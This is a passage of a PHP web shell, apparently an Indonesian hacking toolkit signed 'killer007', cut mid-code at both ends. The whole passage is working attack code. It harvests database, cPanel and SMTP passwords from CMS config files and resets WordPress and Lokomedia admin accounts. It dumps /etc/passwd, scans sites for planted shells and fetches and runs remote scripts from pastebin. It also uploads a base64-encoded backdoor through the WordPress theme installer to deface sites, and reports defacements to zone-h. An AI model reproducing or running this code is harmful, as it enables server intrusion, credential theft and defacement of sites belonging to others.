= "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; if ($target2 == '') { $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; } else { $cek_login3 = file_get_contents("{$target2}/adminweb/"); $cek_login4 = file_get_contents("{$target2}/lokomedia/adminweb/"); if (preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => <a href='{$target2}/adminweb' target='_blank'><u>{$target2}/adminweb</u></a><br>"; } elseif (preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => <a href='{$target2}/lokomedia/adminweb' target='_blank'><u>{$target2}/lokomedia/adminweb</u></a><br>"; } else { $url_target2 = "Login => <a href='{$target2}' target='_blank'><u>{$target2}</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>"; } } } else { $cek_login = file_get_contents("{$target}/adminweb/"); $cek_login2 = file_get_contents("{$target}/lokomedia/adminweb/"); if (preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => <a href='{$target}/adminweb' target='_blank'><u>{$target}/adminweb</u></a><br>"; } elseif (preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => <a href='{$target}/lokomedia/adminweb' target='_blank'><u>{$target}/lokomedia/adminweb</u></a><br>"; } else { $url_target = "Login => <a href='{$target}' target='_blank'><u>{$target}</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>"; } } $update = mysql_query("UPDATE {$prefix} SET username='{$user_baru}',password='{$pass_baru}' WHERE level='admin'"); echo "Config => " . $file_conf . "<br>"; echo "CMS => Lokomedia<br>"; if (preg_match("/error, gabisa ambil nama domain nya/", $url_target)) { echo $url_target2; } else { echo $url_target; } if (!$update or !$conn or !$db) { echo "Status => <font color=red>" . mysql_error() . "</font><br><br>"; } else { echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"; } mysql_close($conn); } } } } else { echo "<center>
\x9\x9<h1>Auto Edit User Config</h1>\xa \x9<form method='post'>\xa \x9DIR Config: <br>
\x9 <input type='text' size='50' name='config_dir' value='{$dir}'><br><br>
Set User & Pass: <br>
\x9<input type='text' name='user_baru' value='killer007' placeholder='user_baru'><br>\xa \x9<input type='text' name='pass_baru' value='killer007' placeholder='pass_baru'><br>\xa\x9 <input type='submit' name='hajar' value='Hack' style='width: 215px;'>\xa\x9 </form>\xa \x9<span style='color:red'>I can hacked you in 15 minutes.</span><br>\xa\x9\x9"; } } elseif ($_GET["do"] == "shelscan") { echo "<center><h2>Shell Finder</h2>
<form action="" method="post">
<input type="text" size="50" name="traget" value="http://www.site.com/"/>\xa<br>\xa<input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
</form><br>"; if (isset($_POST["scan"])) { $url = $_POST["traget"]; echo "<br /><span class='start'>Scanning " . $url . "<br /><br /></span>"; echo "Result :<br />"; $shells = array("WSO.php", "dz.php", "cpanel.php", "cpn.php", "sql.php", "mysql.php", "madspot.php", "cp.php", "cpbt.php", "sYm.php", "x.php", "r99.php", "lol.php", "jo.php", "wp.php", "whmcs.php", "shellz.php", "d0main.php", "d0mains.php", "users.php", "Cgishell.pl", "killer.php", "changeall.php", "2.php", "Sh3ll.php", "dz0.php", "dam.php", "user.php", "dom.php", "whmcs.php", "vb.zip", "r00t.php", "c99.php", "gaza.php", "1.php", "wp.zip" . "wp-content/plugins/disqus-comment-system/disqus.php", "d0mains.php", "wp-content/plugins/akismet/akismet.php", "madspotshell.php", "Sym.php", "c22.php", "c100.php", "wp-content/plugins/akismet/admin.php#", "wp-content/plugins/google-sitemap-generator/sitemap-core.php#", "wp-content/plugins/akismet/widget.php#", "Cpanel.php", "zone-h.php", "tmp/user.php", "tmp/Sym.php", "cp.php", "tmp/madspotshell.php", "tmp/root.php", "tmp/whmcs.php", "tmp/index.php", "tmp/2.php", "tmp/dz.php", "tmp/cpn.php", "tmp/changeall.php", "tmp/Cgishell.pl", "tmp/sql.php", "tmp/admin.php", "cliente/downloads/h4xor.php", "whmcs/downloads/dz.php", "L3b.php", "d.php", "tmp/d.php", "tmp/L3b.php", "wp-content/plugins/akismet/admin.php", "templates/rhuk_milkyway/index.php", "templates/beez/index.php", "admin1.php", "upload.php", "up.php", "vb.zip", "vb.rar", "admin2.asp", "uploads.php", "sa.php", "sysadmins/", "admin1/", "administration/Sym.php", "images/Sym.php", "/r57.php", "/wp-content/plugins/disqus-comment-system/disqus.php", "/shell.php", "/sa.php", "/admin.php", "/sa2.php", "/2.php", "/gaza.php", "/up.php", "/upload.php", "/uploads.php", "/templates/beez/index.php", "shell.php", "/amad.php", "/t00.php", "/dz.php", "/site.rar", "/Black.php", "/site.tar.gz", "/home.zip", "/home.rar", "/home.tar", "/home.tar.gz", "/forum.zip", "/forum.rar", "/forum.tar", "/forum.tar.gz", "/test.txt", "/ftp.txt", "/user.txt", "/site.txt", "/error_log", "/error", "/cpanel", "/awstats", "/site.sql", "/vb.sql", "/forum.sql", "/backup.sql", "/back.sql", "/data.sql", "wp.rar/", "wp-content/plugins/disqus-comment-system/disqus.php", "asp.aspx", "/templates/beez/index.php", "tmp/vaga.php", "tmp/killer.php", "whmcs.php", "tmp/killer.php", "tmp/domaine.pl", "tmp/domaine.php", "useradmin/", "tmp/d0maine.php", "d0maine.php", "tmp/sql.php", "tmp/dz1.php", "dz1.php", "forum.zip", "Symlink.php", "Symlink.pl", "forum.rar", "joomla.zip", "joomla.rar", "wp.php", "buck.sql", "sysadmin.php", "images/c99.php", "xd.php", "c100.php", "spy.aspx", "xd.php", "tmp/xd.php", "sym/root/home/", "billing/killer.php", "tmp/upload.php", "tmp/admin.php", "Server.php", "tmp/uploads.php", "tmp/up.php", "Server/", "wp-admin/c99.php", "tmp/priv8.php", "priv8.php", "cgi.pl/", "tmp/cgi.pl", "downloads/dom.php", "templates/ja-helio-farsi/index.php", "webadmin.html", "admins.php", "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/", "admins.asp", "admins.php", "wp.zip", "wso2.5.1", "pasir.php", "pasir2.php", "up.php", "cok.php", "newfile.php", "upl.php", ".php", "a.php", "crot.php", "kontol.php", "hmei7.php", "jembut.php", "memek.php", "tai.php", "rabit.php", "indoxploit.php", "a.php", "hemb.php", "hack.php", "galau.php", "HsH.php", "indoXploit.php", "asu.php", "wso.php", "lol.php", "idx.php", "rabbit.php", "1n73ction.php", "k.php", "mailer.php", "mail.php", "temp.php", "c.php", "d.php", "IDB.php", "indo.php", "indonesia.php", "semvak.php", "ndasmu.php", "cox.php", "as.php", "ad.php", "aa.php", "file.php", "peju.php", "asd.php", "configs.php", "ass.php", "z.php"); foreach ($shells as $shell) { $headers = get_headers("{$url}{$shell}"); if (eregi("200", $headers[0])) { echo "<a href='{$url}{$shell}'>{$url}{$shell}</a> <span class='found'>Done :D</span><br /><br/><br/>"; $dz = fopen("shells.txt", "a+"); $suck = "{$url}{$shell}"; fwrite($dz, $suck . "
"); } } echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>"; } } elseif ($_GET["do"] == "cpanel") { if ($_POST["crack"]) { $usercp = explode("\xd
", $_POST["user_cp"]); $passcp = explode("
", $_POST["pass_cp"]); $i = 0; foreach ($usercp as $ucp) { foreach ($passcp as $pcp) { if (@mysql_connect("localhost", $ucp, $pcp)) { if ($_SESSION[$ucp] && $_SESSION[$pcp]) { } else { $_SESSION[$ucp] = "1"; $_SESSION[$pcp] = "1"; $i++; echo "username (<font color=lime>{$ucp}</font>) password (<font color=lime>{$pcp}</font>)<br>"; } } } } if ($i == 0) { } else { echo "<br>Nemu " . $i . " Cpanel by <font color=lime>JanCox</font>"; } } else { echo "<center>\xa\x9\x9<form method='post'>
USER: <br>\xa \x9<textarea style='width: 450px; height: 150px;' name='user_cp'>"; $_usercp = fopen("/etc/passwd", "r"); while ($getu = fgets($_usercp)) { if ($getu == '' || !$_usercp) { echo "<font color=red>Can't read /etc/passwd</font>"; } else { preg_match_all("/(.*?):x:/", $getu, $u); foreach ($u[1] as $user_cp) { if (is_dir("/home/{$user_cp}/public_html")) { echo "{$user_cp}\xa"; } } } } echo "</textarea><br>
\x9 PASS: <br>\xa\x9 <textarea style='width: 450px; height: 200px;' name='pass_cp'>"; function cp_pass($dir) { $pass = ''; $dira = scandir($dir); foreach ($dira as $dirb) { if (!is_file("{$dir}/{$dirb}")) { continue; } $ambil = file_get_contents("{$dir}/{$dirb}"); if (preg_match("/WordPress/", $ambil)) { $pass .= ambilkata($ambil, "DB_PASSWORD', '", "'") . "
"; } elseif (preg_match("/JConfig|joomla/", $ambil)) { $pass .= ambilkata($ambil, "password = '", "'") . "\xa"; } elseif (preg_match("/Magento|Mage_Core/", $ambil)) { $pass .= ambilkata($ambil, "<password><![CDATA[", "]]></password>") . "\xa"; } elseif (preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) { $pass .= ambilkata($ambil, "password = "", """) . "
"; } elseif (preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) { $pass .= ambilkata($ambil, "'DB_PASSWORD', '", "'") . "
"; } elseif (preg_match("/client/", $ambil)) { preg_match("/password=(.*)/", $ambil, $pass1); if (preg_match("/"/", $pass1[1])) { $pass1[1] = str_replace(""", '', $pass1[1]); $pass .= $pass1[1] . "
"; } } elseif (preg_match("/cc_encryption_hash/", $ambil)) { $pass .= ambilkata($ambil, "db_password = '", "'") . "\xa"; } } echo $pass; } $cp_pass = cp_pass($dir); echo $cp_pass; echo "</textarea><br>
\x9 <input type='submit' name='crack' style='width: 450px;' value='Crack'>\xa\x9\x9</form>\xa \x9<span>/Do you know who is killer007</span><br></center>"; } } elseif ($_GET["do"] == "smtp") { echo "<center><span style='color:red'>If you want to root the server,enumeration is key.Go and find lse script on google</span></center><br>"; function scj($dir) { $dira = scandir($dir); foreach ($dira as $dirb) { if (!is_file("{$dir}/{$dirb}")) { continue; } $ambil = file_get_contents("{$dir}/{$dirb}"); $ambil = str_replace("$", '', $ambil); if (preg_match("/JConfig|joomla/", $ambil)) { $smtp_host = ambilkata($ambil, "smtphost = '", "'"); $smtp_auth = ambilkata($ambil, "smtpauth = '", "'"); $smtp_user = ambilkata($ambil, "smtpuser = '", "'"); $smtp_pass = ambilkata($ambil, "smtppass = '", "'"); $smtp_port = ambilkata($ambil, "smtpport = '", "'"); $smtp_secure = ambilkata($ambil, "smtpsecure = '", "'"); echo "SMTP Host: <font color=lime>{$smtp_host}</font><br>"; echo "SMTP port: <font color=lime>{$smtp_port}</font><br>"; echo "SMTP user: <font color=lime>{$smtp_user}</font><br>"; echo "SMTP pass: <font color=lime>{$smtp_pass}</font><br>"; echo "SMTP auth: <font color=lime>{$smtp_auth}</font><br>"; echo "SMTP secure: <font color=lime>{$smtp_secure}</font><br><br>"; } } } $smpt_hunter = scj($dir); echo $smpt_hunter; } elseif ($_GET["do"] == "auto_wp") { if ($_POST["hajar"]) { $title = htmlspecialchars($_POST["new_title"]); $pn_title = str_replace(" ", "-", $title); if ($_POST["cek_edit"] == "Y") { $script = $_POST["edit_content"]; } else { $script = $title; } $conf = $_POST["config_dir"]; $scan_conf = scandir($conf); foreach ($scan_conf as $file_conf) { if (!is_file("{$conf}/{$file_conf}")) { continue; } $config = file_get_contents("{$conf}/{$file_conf}"); if (preg_match("/WordPress/", $config)) { $dbhost = ambilkata($config, "DB_HOST', '", "'"); $dbuser = ambilkata($config, "DB_USER', '", "'"); $dbpass = ambilkata($config, "DB_PASSWORD', '", "'"); $dbname = ambilkata($config, "DB_NAME', '", "'"); $dbprefix = ambilkata($config, "table_prefix = '", "'"); $prefix = $dbprefix . "posts"; $option = $dbprefix . "options"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$prefix} ORDER BY ID ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM {$option} ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; $update = mysql_query("UPDATE {$prefix} SET post_title='{$title}',post_content='{$script}',post_name='{$pn_title}',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='{$id}'"); $update .= mysql_query("UPDATE {$option} SET option_value='{$title}' WHERE option_name='blogname' OR option_name='blogdescription'"); echo "<div style='margin: 5px auto;'>"; if ($target == '') { echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> "; } else { echo "URL: <a href='{$target}/?p={$id}' target='_blank'>{$target}/?p={$id}</a> -> "; } if (!$update or !$conn or !$db) { echo "<font color=red>MySQL Error: " . mysql_error() . "</font><br>"; } else { echo "<font color=lime>sukses di ganti.</font><br>"; } echo "</div>"; mysql_close($conn); } } } else { echo "<center>
\x9<h1>Auto Edit Title+Content WordPress</h1>\xa\x9\x9<form method='post'>
\x9DIR Config: <br>\xa \x9<input type='text' size='50' name='config_dir' value='{$dir}'><br><br>\xa \x9Set Title: <br>
\x9\x9<input type='text' name='new_title' value='Hacked By Sudo Family' placeholder='New Title'><br><br>
\x9\x9Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
\x9
<textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>\xa\x9\x9<input type='submit' name='hajar' value='hack' style='width: 450px;'><br>\xa\x9\x9</form>\xa \x9<br>
\x9\x9"; } } elseif ($_GET["do"] == "zoneh") { if ($_POST["submit"]) { $domain = explode("\xd\xa", $_POST["url"]); $nick = $_POST["nick"]; echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier={$nick}/published=0' target='_blank'>http://www.zone-h.org/archive/notifier={$nick}/published=0</a><br>"; echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier={$nick}' target='_blank'>http://www.zone-h.org/archive/notifier={$nick}</a><br><br>"; function zoneh($url, $nick) { $ch = curl_init("http://www.zone-h.com/notify/single"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer={$nick}&domain1={$url}&hackmode=1&reason=1&submit=Send"); return curl_exec($ch); curl_close($ch); } foreach ($domain as $url) { $zoneh = zoneh($url, $nick); if (preg_match("/color="red">OK<\/font><\/li>/i", $zoneh)) { echo "{$url} -> <font color=lime>OK</font><br>"; } else { echo "{$url} -> <font color=red>ERROR</font><br>"; } } } else { echo "<center><form method='post'>\xa\x9 <u>Defacer</u>: <br>\xa <input type='text' name='nick' size='50' value'Killer007'><br>
\x9 <u>Domains</u>: <br>\xa\x9\x9<textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
<input type='submit' name='submit' value='Submit' style='width: 450px;'>\xa \x9</form>"; } echo "</center>"; } elseif ($_GET["do"] == "lcf") { mkdir("LCF", 493); chdir("LCF"); $kokdosya = ".htaccess"; $dosya_adi = "{$kokdosya}"; $dosya = fopen($dosya_adi, "w") or die("Error mas broo!!!"); $metin = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \xa AddType application/x-httpd-cgi .pl \xa AddHandler cgi-script .pl \xa AddHandler cgi-script .pl
\xa
Options
DirectoryIndex seees.html \xa RemoveHandler .php
AddType application/octet-stream .php"; fwrite($dosya, $metin); fclose($dosya); $file = fopen("lcf.pl", "w+"); $write = fwrite($file, file_get_contents("http://pastebin.com/raw/26jAL0sz")); fclose($file); chmod("lcf.pl", 493); echo "<iframe src=LCF/lcf.pl width=97% height=100% frameborder=0></iframe>"; } elseif ($_GET["do"] == "cgi") { $cgi_dir = mkdir("idx_cgi", 493); $file_cgi = "idx_cgi/cgi.izo"; $isi_htcgi = "AddHandler cgi-script .izo"; $htcgi = fopen(".htaccess", "w"); $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg"); $cgi = fopen($file_cgi, "w"); fwrite($cgi, $cgi_script); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 493); echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>"; } elseif ($_GET["do"] == "fake_root") { ob_start(); function reverse($url) { $ch = curl_init("http://domains.yougetsignal.com/domains.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress={$url}&ket="); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); $resp = curl_exec($ch); $resp = str_replace("[", '', str_replace("]", '', str_replace("""", '', str_replace(", ,", ",", str_replace("{", '', str_replace("{", '', str_replace("}", '', str_replace(", ", ",", str_replace(", ", ",", str_replace("'", '', str_replace("'", '', str_replace(":", ",", str_replace(""", '', $resp))))))))))))); $array = explode(",,", $resp); unset($array[0]); foreach ($array as $lnk) { $lnk = "http://{$lnk}"; $lnk = str_replace(",", '', $lnk); echo $lnk . "
"; ob_flush(); flush(); } curl_close($ch); } function cek($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $resp = curl_exec($ch); return $resp; } $cwd = getcwd(); $ambil_user = explode("/", $cwd); $user = $ambil_user[2]; if ($_POST["reverse"]) { $site = explode("
\xa", $_POST["url"]); $file = $_POST["file"]; foreach ($site as $url) { $cek = cek("{$url}/~{$user}/{$file}"); if (preg_match("/hacked/i", $cek)) { echo "URL: <a href='{$url}/~{$user}/{$file}' target='_blank'>{$url}/~{$user}/{$file}</a> -> <font color=lime>Fake Root!</font><br>"; } } } else { echo "<center><form method='post'>
\x9 Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
User: <br><input type='text' value='{$user}' size='50' height='10' readonly><br>\xa Domain: <br>\xa\x9 <textarea style='width: 450px; height: 250px;' name='url'>"; reverse($_SERVER["HTTP_HOST"]); echo "</textarea><br>
\x9 <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
\x9 </form><br>
\x9NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>"; } } elseif ($_GET["do"] == "adminer") { $full = str_replace($_SERVER["DOCUMENT_ROOT"], '', $dir); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if (file_exists("adminer.php")) { echo "<center><font color=lime><a href='{$full}/adminer.php' target='_blank'>-> adminer login <-</a></font></center>"; } else { if (adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php", "adminer.php")) { echo "<center><font color=lime><a href='{$full}/adminer.php' target='_blank'>-> adminer login <-</a></font></center>"; } else { echo "<center><font color=red>gagal buat file adminer</font></center>"; } } } elseif ($_GET["do"] == "passwbypass") { echo "<center>Bypass etc/passw With:<br>\xa<table style="width:50%">\xa <tr>
<td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>\xa <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>\xa <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
<td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
<td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>\xa</tr></table>Bypass User With : <table style="width:50%">
<tr>
<td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
<td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
<td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
<td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td> \x9\xa <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
</tr>\xa</table><br>"; if ($_POST["awkuser"]) { echo "<textarea class='inputzbut' cols='65' rows='15'>"; echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort"); echo "</textarea><br>"; } if ($_POST["systuser"]) { echo "<textarea class='inputzbut' cols='65' rows='15'>"; echo system("ls /var/mail"); echo "</textarea><br>"; } if ($_POST["passthuser"]) { echo "<textarea class='inputzbut' cols='65' rows='15'>"; echo passthru("ls /var/mail"); echo "</textarea><br>"; } if ($_POST["exuser"]) { echo "<textarea class='inputzbut' cols='65' rows='15'>"; echo exec("ls /var/mail"); echo "</textarea><br>"; } if ($_POST["shexuser"]) { echo "<textarea class='inputzbut' cols='65' rows='15'>"; echo shell_exec("ls /var/mail"); echo "</textarea><br>"; } if ($_POST["syst"]) { echo "<textarea class='inputz' cols='65' rows='15'>"; echo system("cat /etc/passwd"); echo "</textarea><br><br><b></b><br>"; } if ($_POST["passth"]) { echo "<textarea class='inputz' cols='65' rows='15'>"; echo passthru("cat /etc/passwd"); echo "</textarea><br><br><b></b><br>"; } if ($_POST["ex"]) { echo "<textarea class='inputz' cols='65' rows='15'>"; echo exec("cat /etc/passwd"); echo "</textarea><br><br><b></b><br>"; } if ($_POST["shex"]) { echo "<textarea class='inputz' cols='65' rows='15'>"; echo shell_exec("cat /etc/passwd"); echo "</textarea><br><br><b></b><br>"; } echo "<center>"; if ($_POST["melex"]) { echo "<textarea class='inputz' cols='65' rows='15'>"; for ($uid = 0; $uid < 60000; $uid++) { $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { print "{$val}:"; } print "
"; } } echo "</textarea><br><br>"; } } elseif ($_GET["do"] == "auto_dwp") { if ($_POST["auto_deface_wp"]) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array("log" => "{$userr}", "pwd" => "{$pass}", "rememberme" => "forever", "wp-submit" => "{$wp_submit}", "redirect_to" => "{$web}", "testcookie" => "1"); $ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $scan = $_POST["link_config"]; $link_config = scandir($scan); $script = htmlspecialchars($_POST["script"]); $user = "0x1999"; $pass = "0x1999"; $passx = md5($pass); foreach ($link_config as $dir_config) { if (!is_file("{$scan}/{$dir_config}")) { continue; } $config = file_get_contents("{$scan}/{$dir_config}"); if (preg_match("/WordPress/", $config)) { $dbhost = ambilkata($config, "DB_HOST', '", "'"); $dbuser = ambilkata($config, "DB_USER', '", "'"); $dbpass = ambilkata($config, "DB_PASSWORD', '", "'"); $dbname = ambilkata($config, "DB_NAME', '", "'"); $dbprefix = ambilkata($config, "table_prefix = '", "'"); $prefix = $dbprefix . "users"; $option = $dbprefix . "options"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$prefix} ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM {$option} ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if ($target == '') { echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>"; } else { echo "[+] {$target} <br>"; } $update = mysql_query("UPDATE {$prefix} SET user_login='{$user}',user_pass='{$passx}' WHERE ID='{$id}'"); if (!$conn or !$db or !$update) { echo "[-] MySQL Error: <font color=red>" . mysql_error() . "</font><br><br>"; mysql_close($conn); } else { $site = "{$target}/wp-login.php"; $site2 = "{$target}/wp-admin/theme-install.php?upload"; $b1 = anucurl($site2); $wp_sub = ambilkata($b1, "id="wp-submit" class="button button-primary button-large" value="", "" />"); $b = lohgin($site, $site2, $user, $pass, $wp_sub); $anu2 = ambilkata($b, "name="_wpnonce" value="", "" />"); $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg=="); $www = "m.php"; $fp5 = fopen($www, "w"); fputs($fp5, $upload3); $post2 = array("_wpnonce" => "{$anu2}", "_wp_http_referer" => "/wp-admin/theme-install.php?upload", "themezip" => "@{$www}", "install-theme-submit" => "Install Now"); $ch = curl_init("{$target}/wp-admin/update.php?action=upload-theme"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data3 = curl_exec($ch); curl_close($ch); $y = date("Y"); $m = date("m"); $namafile = "id.php"; $fpi = fopen($namafile, "w"); fputs($fpi, $script); $ch6 = curl_init("{$target}/wp-content/uploads/{$y}/{$m}/{$www}"); curl_setopt($ch6, CURLOPT_POST, true); curl_setopt($ch6, CURLOPT_POSTFIELDS, array("file3" => "@{$namafile}")); curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch6, CURLOPT_COOKIEJAR, "cookie.txt"); curl_setopt($ch6, CURLOPT_COOKIESESSION, true); $postResult = curl_exec($ch6); curl_close($ch6); $as = "{$target}/k.php"; $bs = anucurl($as); if (preg_match("#{$script}#is", $bs)) { echo "[+] <font color='lime'>berhasil mepes...</font><br>"; echo "[+] <a href='{$as}' target='_blank'>{$as}</a><br><br>"; } else { echo "[-] <font color='red'>gagal mepes...</font><br>"; echo "[!!] coba aja manual: <br>"; echo "[+] <a href='{$target}/wp-login.php' target='_blank'>{$target}/wp-login.php</a><br>"; echo "[+] username: <font color=lime>{$user}</font><br>"; echo "[+] password: <font color=lime>{$pass}</font><br><br>"; } mysql_close($conn); } } } } else { echo "<center><h1>WordPress Auto Deface</h1>\xa <form method='post'>
<input type='text' name='link_config' size='50' height='10' value='{$dir}'><br>
\x9\x9<input type='text' name='script' height='10' size='50' placeholder='Hacked By killer007' required><br>\xa \x9<input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hack'>
\x9\x9</form>
\x9<br>\xa \x9</center>"; } } elseif ($_GET["do"] == "auto_dwp2") { if ($_POST["auto_deface_wp"]) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array("log" => "{$userr}", "pwd" => "{$pass}", "rememberme" => "forever", "wp-submit" => "{$wp_submit}", "redirect_to" => "{$web}", "testcookie" => "1"); $ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 